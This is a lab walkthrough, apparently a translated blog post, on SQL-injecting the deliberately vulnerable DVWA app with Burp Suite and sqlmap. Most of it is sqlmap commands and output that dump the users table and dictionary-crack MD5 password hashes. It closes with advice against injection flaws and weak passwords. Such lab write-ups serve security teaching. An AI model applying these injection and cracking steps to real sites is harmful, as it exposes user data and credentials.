0x1: Introduction to Tools and environments
DVWA: Penetration test environment
Burpsuite: A powerful web security testing tool
SQLMAP: Powerful SQL injection Tool
The above tools and environments are installed and configured on Kali Linux.
0x2: Step Description
- Configure Burp suite and browser .
This is a simple step, mainly used to crawl the information used for SQL injection.
Set proxy agent in Burp: 127.0.0.1:8080, configure the browser to use the proxy, so that the browser request information can be burp crawl.
- Crawling Login Information
The Burp proxy interface can crawl the information accessed by the browser, as follows:
You can see the ID information in the login because the DVWA security level has been set to a minimum, there must be an injection point. The next step is to inject the test with Sqlmap.
The Sqlmap is powerful, and the usage of the theme can be referenced in the manual.
Here it is possible to detect that the ID is an injection point. Next you can see what data tables are in the DVWA database:
Because a cookie is required for injection, the contents of the above raw are copied to a file, and the Sqlmap will be used later.
Sqlmap-r/HOME/FLYER/TEST-SEC/1--current-user--current-db--tables can see all the tables in the current database because it is the user who uses the root account as the database.
Only DVWA tables are listed here:
Database:dvwa
[2 tables]
+----------------------------------------------+
| Guestbook |
| Users |
+----------------------------------------------+
These instructions can be SQL injection, and also get the name of the database table DVWA, here you can see a users table, then you can probe the table to see if there is some useful information.
- Get the user table and crack the password:
The operation is as follows, there is a detailed procedure, no longer repeat here.
[Email protected]:/var/www# sqlmap-r/HOME/FLYER/TEST-SEC/1--search-d dvwa-t users
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150510}
|_ -| . | | |. ' | . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
Do your want Sqlmap to consider provided table (s):
[1] as like table names (default)
[2] as exact table names
> 2
[21:35:03] [INFO] Searching table ' users ' for database ' DVWA '
[21:35:03] [WARNING] reflective value (s) found and filtering out
Database:dvwa
[1 Table]
+-------+
| users |
+-------+
Do you want to dump tables ' entries? [y/n] Y
which database (s)?
[A]ll (default)
[DVWA]
[Q]uit
> Dvwa
which table (s) of database ' Dvwa '?
[A]ll (default)
[Users]
[S]kip
[Q]uit
> Users
[21:35:24] [INFO] fetching columns for table ' users ' in database ' Dvwa '
[21:35:24] [INFO] fetching entries for table ' users ' in database ' Dvwa '
[21:35:24] [INFO] Analyzing table dump for possible password hashes
[21:35:24] [INFO] recognized possible password hashes in column ' Password '
want to store hashes to a temporary file for eventual further processing with other tools [y/n] y
[21:35:30] [INFO] writing hashes to a temporary file '/tmp/sqlmapmliboq15506/sqlmaphashes-rpfigo.txt '
does want to crack them via a dictionary-based attack? [y/n/q] Y
[21:35:36] [INFO] using hash method ' MD5_GENERIC_PASSWD '
What dictionary does want to use?
[1] Default dictionary file '/usr/share/sqlmap/txt/wordlist.zip ' (press Enter)
[2] custom dictionary file
[3] file with List of dictionary files
>
[21:35:47] [INFO] using default dictionary
Do you want to use common password suffixes? (slow!) [y/n] y
[21:35:54] [INFO] starting dictionary-based cracking (MD5_GENERIC_PASSWD)
[21:35:54] [INFO] Starting 2 processes
[21:35:54] [INFO] cracked password ' 1111 ' for hash ' B59c67bf196a4758191e42f76670ceba '
[21:35:57] [INFO] cracked password ' abc123 ' for hash ' e99a18c428cb38d5f260853678922e03 '
[21:36:00] [INFO] cracked password ' Charley ' for Hash ' 8d3533d75ae2c3966d7e0d4fcc69216b '
[21:36:05] [INFO] cracked password ' letmein ' for hash ' 0d107d09f5bbe40cade3de5c71e9e9b7 '
[21:36:07] [INFO] cracked password ' password ' for hash ' 5f4dcc3b5aa765d61d8327deb882cf99 '
[21:36:11] [INFO] postprocessing table Dump
Database:dvwa
table:users
[5 Entries]
+---------+---------+--------------------------------------------------+----------------------------------- ----------+-----------+------------+
| user_id | user | avatar | password | last_name | first_name |
+---------+---------+--------------------------------------------------+----------------------------------- ----------+-----------+------------+
| 1 | admin | http://localhost/dvwa/hackable/users/admin.jpg | b59c67bf196a4758191e42f76670ceba (1111) | admin | admin |
| 2 | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon |
| 3 | 1337 | http://localhost/dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (Charley) | Me | Hack |
| 4 | pablo | http://localhost/dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (Letmein) | Picasso | Pablo |
| 5 | smithy | http://localhost/dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob |
+---------+---------+--------------------------------------------------+----------------------------------- ----------+-----------+------------+
0X3: summary
Cracked successfully, you can see the user name and password are listed.
In the design of the site must consider whether there is a vulnerability to SQL injection, or it is easy to leak the user's sensitive information.
Here to crack the password hash is Sqlmap's own dictionary, quickly cracked out, indicating that the user password set is not safe.
Passwords must not use commonly used combinations or data that is too clear in meaning.
SQL injection test and user name password brute force hack for DVWA with Burpsuite and Sqlmap